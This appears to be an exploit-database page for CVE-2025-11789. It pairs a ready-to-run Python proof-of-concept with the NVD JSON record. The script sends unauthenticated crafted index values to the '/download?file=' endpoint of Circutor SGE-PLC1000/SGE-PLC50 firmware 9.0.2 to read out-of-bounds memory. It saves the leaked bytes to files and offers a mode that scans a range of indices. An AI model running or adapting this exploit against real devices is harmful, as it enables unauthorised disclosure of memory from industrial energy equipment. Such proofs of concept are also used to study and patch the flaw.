CVE-2025-11789

#!/usr/bin/env python3 """ CVE-2025-11789 PoC - Circutor SGE-PLC Out-of-bounds Read Target: Circutor SGE-PLC1000/SGE-PLC50 Firmware <= 9.0.2 Reference: https://nvd.nist.gov/vuln/detail/CVE-2025-11789 """ import requests import sys import argparse def exploit(target_url, index_value): """ Exploit the out-of-bounds read vulnerability in DownloadFile function. The function uses atoi() to convert parameter to integer and uses it as index in FilesDownload array without bounds checking. Args: target_url: Base URL of the Circutor SGE-PLC device index_value: Integer index to access out of bounds in FilesDownload array """ # Construct the malicious request exploit_url = f"{target_url}/download?file={index_value}" print(f"[*] Target: {target_url}") print(f"[*] Exploit URL: {exploit_url}") print(f"[*] Attempting out-of-bounds read at index: {index_value}") try: # Send HTTP GET request with malicious index value # No authentication required (PR:N) response = requests.get(exploit_url, timeout=10) print(f"[+] Response Status: {response.status_code}") print(f"[+] Response Length: {len(response.content)} bytes") # Check if we got any data (potential information disclosure) if response.status_code == 200 and len(response.content) > 0: print("[!] Potential information disclosure detected!") print(f"[*] Response Content (first 500 bytes):") print(response.content[:500]) # Save the response for analysis with open(f"oob_read_result_{index_value}.bin", "wb") as f: f.write(response.content) print(f"[*] Full response saved to oob_read_result_{index_value}.bin") return response except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return None def scan_memory(target_url, start_index=0, end_index=100): """ Scan memory by trying different index values. Compare response lengths to identify valid array bounds. """ print(f"[*] Starting memory scan from index {start_index} to {end_index}") baseline_length = None results = [] for idx in range(start_index, end_index + 1): try: response = requests.get( f"{target_url}/download?file={idx}", timeout=5 ) content_length = len(response.content) if baseline_length is None: baseline_length = content_length print(f"[*] Baseline response length: {content_length}") # Detect anomalies in response if content_length != baseline_length: print(f"[!] Index {idx}: Length={content_length} (diff={content_length - baseline_length})") results.append({ 'index': idx, 'length': content_length, 'diff': content_length - baseline_length }) except Exception as e: print(f"[-] Index {idx}: Error - {e}") print(f"\n[*] Scan complete. Found {len(results)} anomalies.") return results if __name__ == "__main__": parser = argparse.ArgumentParser( description="CVE-2025-11789 PoC - Circutor SGE-PLC Out-of-bounds Read" ) parser.add_argument("-t", "--target", required=True, help="Target URL") parser.add_argument("-i", "--index", type=int, default=999999, help="Index value for out-of-bounds read (default: 999999)") parser.add_argument("-s", "--scan", action="store_true", help="Enable memory scan mode") parser.add_argument("--start", type=int, default=0, help="Scan start index") parser.add_argument("--end", type=int, default=100, help="Scan end index") args = parser.parse_args() if args.scan: scan_memory(args.target, args.start, args.end) else: exploit(args.target, args.index)

{"cve": {"id": "CVE-2025-11789", "sourceIdentifier": "[email protected]", "published": "2025-12-02T13:15:52.897", "lastModified": "2025-12-03T19:18:00.623", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "Out-of-bounds read vulnerability in Circutor SGE-PLC1000/SGE-PLC50 v9.0.2. The 'DownloadFile' function converts a parameter to an integer using 'atoi()' and then uses it as an index in the 'FilesDownload' array with '(&FilesDownload)[iVar2]'. If the parameter is too large, it will access memory beyond the limits."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:circutor:sge-plc1000_firmware:9.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "3FC715A9-6F95-4795-B3B1-1BFAF88ACCE9"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:circutor:sge-plc1000:-:*:*:*:*:*:*:*", "matchCriteriaId": "FFF41215-1018-42DD-9A7E-BBC2E5B4522D"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:circutor:sge-plc50_firmware:9.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "203C8B5E-582A-4680-B324-B9092F01462B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:circutor:sge-plc50:-:*:*:*:*:*:*:*", "matchCriteriaId": "447D1571-5329-422D-8E31-F4964E412FC3"}]}]}], "references": [{"url": "https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-circutor-products-0", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}